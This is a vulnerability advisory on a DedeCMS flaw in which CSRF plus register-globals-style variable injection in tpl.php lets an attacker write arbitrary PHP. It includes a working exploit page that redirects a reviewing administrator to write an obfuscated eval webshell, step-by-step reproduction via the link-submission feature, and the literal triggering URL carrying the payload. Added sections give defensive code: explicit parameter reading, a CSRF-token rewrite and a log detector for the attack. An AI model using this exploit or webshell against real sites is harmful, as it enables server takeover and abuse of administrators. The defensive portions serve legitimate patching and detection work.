DedeCMS privilege escalation through links (CSRF to arbitrary file write)

2017-01-18T00:00:00
ID SSV:92625
Type seebug
Reporter 孤独风
Modified 2017-01-18T00:00:00

Description

In tpl.php:

```php
/*---------------------------
function savetagfile() { }
Save the tag snippet modifications
--------------------------*/
else if($action=='savetagfile')
{
    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
    {
        ShowMsg('File name is not legal, not allowed!', '-1');
        exit();
    }
    require_once(DEDEINC.'/oxwindow.class.php');
    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);
    $content = stripslashes($content);
    $truefile = DEDEINC.'/taglib/'.$filename;
    $fp = fopen($truefile, 'w');
    fwrite($fp, $content);
    fclose($fp);
    $msg = "
    <form name='form1' action='tag_test_action.php' target='blank' method='post'>
    <input type='hidden' name='dopost' value='make' />
    <b>Test tag:</b>(environment variables are needed in the test)
    <textarea name='partcode' cols='150' rows='6' style='width:90%;'>{dede:{$tagname} }{/dede:{$tagname}}</textarea>
    <input name='imageField1' type='image' class='np' src='images/button_ok.gif' width='60' height='22' border='0' />
    </form>
    ";
    $wintitle = "File modified/created successfully!";
    $wecome_info = "<a href='templets_tagsource.php'>Tag source snippet management</a> >> Modify/create tag";
    $win = new OxWindow();
    $win->AddTitle("Modify/new tag:");
    $win->AddMsgItem($msg);
    $winform = $win->GetWindow("hand"," ",false);
    $win->Display();
    exit();
}
```

This is the point where the file is written. Almost all insecurity arises where data enters and leaves a program, so the question is: where do $filename and $content come from, and how are they passed in? Tracking back through config.php to include/common.inc.php (a file with a name like common.php usually holds the functions that are used everywhere), something fishy turns up in common.inc.php:

```php
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        if($_k == 'nvarname') ${$_k} = $_v;
        else ${$_k} = _RunMagicQuotes($_v);
    }
}
```

What is the problem? This code takes the parameters from each of the request arrays and registers them as variables; every GET, POST and COOKIE parameter goes through it.

Look at GET first: the inner loop iterates over $_GET (a superglobal array), with $_k and $_v receiving each key and value. ${$_k} registers the key as a global variable, so a request such as ?test=k4l0n causes $test to be assigned the value k4l0n in this page and in every PHP page that includes it. In tpl.php, $action, $content and $filename are never initialised, so these variables can be controlled from the request to write arbitrary code to a file.
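To make the mechanism concrete, here is an added example (not DedeCMS code) that replays the common.inc.php loop against a constructed request and then shows a whitelist-based way of reading parameters that does not let a stray request key become a variable. The function names registerRequestAsGlobals() and readParams() are chosen for this example, and _RunMagicQuotes() is replaced by a stand-in so the file runs on its own.

```php
<?php
// Added example, not DedeCMS code: what the common.inc.php loop does to a variable
// the page never initialised, and a whitelist-based replacement.

function _RunMagicQuotes($svar)
{
    // Stand-in for the DedeCMS helper (assumption): escape quotes as magic_quotes would.
    return is_array($svar) ? array_map('_RunMagicQuotes', $svar) : addslashes($svar);
}

// Constructed request: the ?test=k4l0n case from the text, plus a key named after
// a variable that tpl.php never initialises ('filename').
$_GET    = array('test' => 'k4l0n', 'filename' => 'shell.lib.php');
$_POST   = array();
$_COOKIE = array();

// 1. The DedeCMS pattern: every request key becomes a global variable.
//    ($GLOBALS[$_k] is used instead of ${$_k} because the original runs at file
//    scope, where ${$_k} is global; inside a function it would not be.)
function registerRequestAsGlobals()
{
    foreach (array('_GET', '_POST', '_COOKIE') as $_request) {
        foreach ($GLOBALS[$_request] as $_k => $_v) {
            $GLOBALS[$_k] = ($_k == 'nvarname') ? $_v : _RunMagicQuotes($_v);
        }
    }
}
registerRequestAsGlobals();
var_dump($test);            // string(5) "k4l0n": a variable no page declared
var_dump(isset($filename)); // bool(true): the file-write branch now has a file name

// 2. Safer pattern: a page declares the parameters it accepts, with defaults, and
//    reads only those from the one source it expects. Unknown keys such as 'test'
//    never become variables, and a GET cannot feed a branch that expects a form POST.
function readParams(array $allowed, array $source)
{
    $out = array();
    foreach ($allowed as $name => $default) {
        $out[$name] = array_key_exists($name, $source) ? $source[$name] : $default;
    }
    return $out;
}
$p = readParams(array('action' => '', 'filename' => '', 'content' => ''), $_POST);
var_dump($p['filename'] === ''); // bool(true): the GET parameter did not reach it
```

The second half is the general fix for the class of bug the text describes, not just for tpl.php: once every variable a branch uses has been initialised from a declared list, the register-globals emulation has nothing left to overwrite.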

Next, track the getUserID function of the 'userLogin' class:

```php
/**
 * Get the user ID
 *
 * @access public
 * @return int
 */
function getUserID()
{
    if($this->userID != '')
    {
        return $this->userID;
    }
    else
    {
        return -1;
    }
}
```

The 'userLogin' class handles user login:

```php
/**
 * Test whether the user is correct
 *
 * @access public
 * @param string $username username
 * @param string $userpwd password
 * @return string
 */
function checkUser($username, $userpwd)
{
    global $dsql;

    //Only allow the characters 0-9,a-z,A-Z,'@','_','.','-' in user name and password
    $this->userName = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $username);
    $this->userPwd = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $userpwd);
    $pwd = substr(md5($this->userPwd), 5, 20);
    $dsql->SetQuery("SELECT admin.*, atype.purviews FROM `#@__admin` admin LEFT JOIN `#@__admintype` atype ON atype.rank=admin.usertype WHERE admin.userid LIKE '".$this->userName."' LIMIT 0,1");
    $dsql->Execute();
    $row = $dsql->GetObject();
    if(!isset($row->pwd))
    {
        return -1;
    }
    else if($pwd!=$row->pwd)
    {
        return -2;
    }
    else
    {
        $loginip = GetIP();
        $this->userID = $row->id;
        $this->userType = $row->usertype;
        $this->userChannel = $row->typeid;
        $this->userName = $row->uname;
        $this->userPurview = $row->purviews;
        $all = "UPDATE `#@__admin` SET loginip='$loginip',logintime='".time()."' WHERE id='".$row->id."'";
        $dsql->ExecuteNoneQuery($all);
        $sql = "UPDATE #@__member SET logintime=".time().", loginip='$loginip' WHERE mid=".$row->id;
        $dsql->ExecuteNoneQuery($sql);
        return 1;
    }
}

/**
 * Maintain the user's session state
 *
 * @access public
 * @return int success returns 1, failure returns -1
 */
function keepUser()
{
    if($this->userID != '' && $this->userType != '')
    {
        global $admincachefile,$adminstyle;
        if(empty($adminstyle)) $adminstyle = 'dedecms';

        @session_register($this->keepUserIDTag);
        $_SESSION[$this->keepUserIDTag] = $this->userID;

        @session_register($this->keepUserTypeTag);
        $_SESSION[$this->keepUserTypeTag] = $this->userType;

        @session_register($this->keepUserChannelTag);
        $_SESSION[$this->keepUserChannelTag] = $this->userChannel;

        @session_register($this->keepUserNameTag);
        $_SESSION[$this->keepUserNameTag] = $this->userName;

        @session_register($this->keepUserPurviewTag);
        $_SESSION[$this->keepUserPurviewTag] = $this->userPurview;

        @session_register($this->keepAdminStyleTag);
        $_SESSION[$this->keepAdminStyleTag] = $adminstyle;

        PutCookie('DedeUserID', $this->userID, 3600 * 24, '/');
        PutCookie('DedeLoginTime', time(), 3600 * 24, '/');

        $this->ReWriteAdminChannel();

        return 1;
    }
    else
    {
        return -1;
    }
}
```

Tracing this shows that nowhere is the page the administrator came from checked; only whether the administrator is logged in is verified, which results in a CSRF vulnerability. The exploitation idea is now clear: the controllable variables allow arbitrary code to be written to a file, and the CSRF weakness means an administrator can be induced to perform that write with administrator privileges.
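As an added example (not DedeCMS code, and not a patch the project shipped), this is how the savetagfile branch looks once both weaknesses above are closed: parameters are read explicitly from $_POST instead of the register-globals emulation, and the write requires a POST carrying a per-session token, so a link an administrator clicks (a GET with no token) is rejected. The names csrf_token(), csrf_require_post_token() and save_taglib_file() are chosen for this example; ShowMsg() and DEDEINC are DedeCMS's own and are stubbed here only so the file runs stand-alone.

```php
<?php
// Added example, not DedeCMS code: a CSRF-protected rewrite of the savetagfile branch.

session_start();

// Stand-ins (assumptions) for DedeCMS's include-path constant and message helper.
if (!defined('DEDEINC')) {
    define('DEDEINC', __DIR__ . '/include');
}
if (!function_exists('ShowMsg')) {
    function ShowMsg($msg, $gourl) { echo $msg, "\n"; }
}

// One token per session, issued when the editing form is rendered; the form must
// carry it in a hidden field named csrf_token.
function csrf_token()
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A forged request arrives either as a GET (a link the administrator clicked) or as
// a cross-site POST that cannot know the session's token; both fail here.
// hash_equals() compares in constant time.
function csrf_require_post_token()
{
    if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;
    }
    $sent     = isset($_POST['csrf_token']) ? (string)$_POST['csrf_token'] : '';
    $expected = isset($_SESSION['csrf_token']) ? (string)$_SESSION['csrf_token'] : '';
    return $expected !== '' && $sent !== '' && hash_equals($expected, $sent);
}

// The write itself: the original file-name check is kept, basename() is added so
// the name can never carry a directory part. Returns 1 on success, -1 for a bad
// name, -2 if the write fails (the same -1/-2/1 convention as checkUser()).
function save_taglib_file($filename, $content)
{
    if (!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)) {
        return -1;
    }
    $truefile = DEDEINC . '/taglib/' . basename($filename);
    if (file_put_contents($truefile, stripslashes($content), LOCK_EX) === false) {
        return -2;
    }
    return 1;
}

// Parameters are read explicitly from the POSTed form; nothing is taken from
// $_GET or $_COOKIE, and every variable has a defined value before use.
$action   = isset($_POST['action'])   ? $_POST['action']   : '';
$filename = isset($_POST['filename']) ? $_POST['filename'] : '';
$content  = isset($_POST['content'])  ? $_POST['content']  : '';

if ($action == 'savetagfile') {
    if (!csrf_require_post_token()) {
        ShowMsg('Request rejected: missing or invalid CSRF token.', '-1');
        exit();
    }
    $rc = save_taglib_file($filename, $content);
    if ($rc == -1) {
        ShowMsg('File name is not legal, not allowed!', '-1');
        exit();
    }
    if ($rc == -2) {
        ShowMsg('Could not write the tag file.', '-1');
        exit();
    }
    ShowMsg('File modified/created successfully!', 'templets_tagsource.php');
}
```

The form that submits to this branch embeds the token as a hidden input whose value is htmlspecialchars(csrf_token()). Checking the Referer header, which the report's EXP relies on being present, is a weaker substitute: browsers and proxies may strip it, so the token check is the one a defender should depend on.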

Vulnerability EXP

```php
<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//strip friendlink_main.php to obtain the path of the dede back end
//Splice together the exp
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='.$muma.'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
```

Vulnerability reproduction

First, deploy this exp on your own server (it needs a public IP); say its URL is http://www.xxxx.com/exp.php. On the target website, submit that URL through the link application feature.

After submission, wait for administrator review. When the administrator audits the application, they will normally click through to your website. Take a look:

The review location in the back end: Modules -> Auxiliary plugins -> Links

When the administrator clicks this link, the one-line webshell is generated; its address is /include/taglib/shell.lib.php.

The link the administrator triggered:

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php

This link uses the administrator's privileges to generate the one-line webshell.
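For anyone responding to or hunting for this, the triggered link above leaves a distinctive trace in the web server's access log: a state-changing savetagfile request made with GET, with a Referer outside the site, followed by direct requests to a file under /include/taglib/. The following added example (not part of the original report) checks constructed Apache combined-format log lines for exactly that pattern. The log lines, $siteHost and the function names parseLogLine() and findSuspiciousRequests() are assumptions made for the example.

```php
<?php
// Added example, not from the original report: flag the request pattern this
// report describes in access-log lines.

$siteHost = '127.0.0.1'; // assumption: the host the admin UI is served from

// Constructed lines in Apache "combined" format (the last two quoted fields are
// Referer and User-Agent). Line 1 is a normal POST from the admin UI, line 2 is
// the GET arriving from a third-party page, line 4 is a request to a dropped
// taglib file. The content parameter is replaced by REDACTED; it is not parsed.
$logLines = array(
    '127.0.0.1 - - [18/Jan/2017:10:00:00 +0800] "POST /dede/tpl.php HTTP/1.1" 200 512 "http://127.0.0.1/dede/templets_tagsource.php" "Mozilla/5.0"',
    '127.0.0.1 - - [18/Jan/2017:10:05:00 +0800] "GET /dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=REDACTED&filename=shell.lib.php HTTP/1.1" 200 512 "http://www.xxxx.com/exp.php" "Mozilla/5.0"',
    '127.0.0.1 - - [18/Jan/2017:10:06:00 +0800] "GET /dede/friendlink_main.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Jan/2017:10:07:00 +0800] "POST /include/taglib/shell.lib.php HTTP/1.1" 200 64 "-" "python-requests/2.12"',
);

// Split one combined-format line into its fields; null if it does not parse.
function parseLogLine($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return array('ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'uri' => $m[4],
                 'status' => (int)$m[5], 'referer' => $m[6], 'ua' => $m[7]);
}

// One finding per suspicious line: array('line' => n, 'ip' => ..., 'reasons' => [...]).
function findSuspiciousRequests(array $lines, $siteHost)
{
    $findings = array();
    foreach ($lines as $i => $line) {
        $r = parseLogLine($line);
        if ($r === null) {
            continue;
        }
        $path  = (string)parse_url($r['uri'], PHP_URL_PATH);
        $query = array();
        parse_str((string)parse_url($r['uri'], PHP_URL_QUERY), $query);
        $reasons = array();

        // Rule 1: the tag-file write reached through tpl.php?action=savetagfile.
        if (substr($path, -8) === '/tpl.php' && isset($query['action']) && $query['action'] === 'savetagfile') {
            if ($r['method'] !== 'POST') {
                $reasons[] = 'savetagfile invoked via ' . $r['method'] . ' (the admin form submits a POST)';
            }
            $refHost = $r['referer'] === '-' ? '' : (string)parse_url($r['referer'], PHP_URL_HOST);
            if ($refHost !== $siteHost) {
                $reasons[] = 'savetagfile with Referer outside the site: ' . ($refHost === '' ? '(none)' : $refHost);
            }
        }
        // Rule 2: taglib files are included by the CMS, never requested directly.
        if (preg_match('#/include/taglib/[a-z0-9_-]+\.lib\.php$#i', $path)) {
            $reasons[] = 'direct web request to a taglib file (' . $path . ')';
        }
        if ($reasons) {
            $findings[] = array('line' => $i + 1, 'ip' => $r['ip'], 'reasons' => $reasons);
        }
    }
    return $findings;
}

foreach (findSuspiciousRequests($logLines, $siteHost) as $f) {
    echo "line {$f['line']} from {$f['ip']}: " . implode('; ', $f['reasons']) . "\n";
}
```

Run against the constructed lines, line 2 is reported for both the GET method and the off-site Referer, and line 4 for the direct taglib request; lines 1 and 3 are silent. Rule 1 is a stand-in for an alert on any administrative write reached by GET; rule 2 is the cheaper, more durable one, and can also be expressed as a web-server rule that denies direct access to /include/taglib/ altogether.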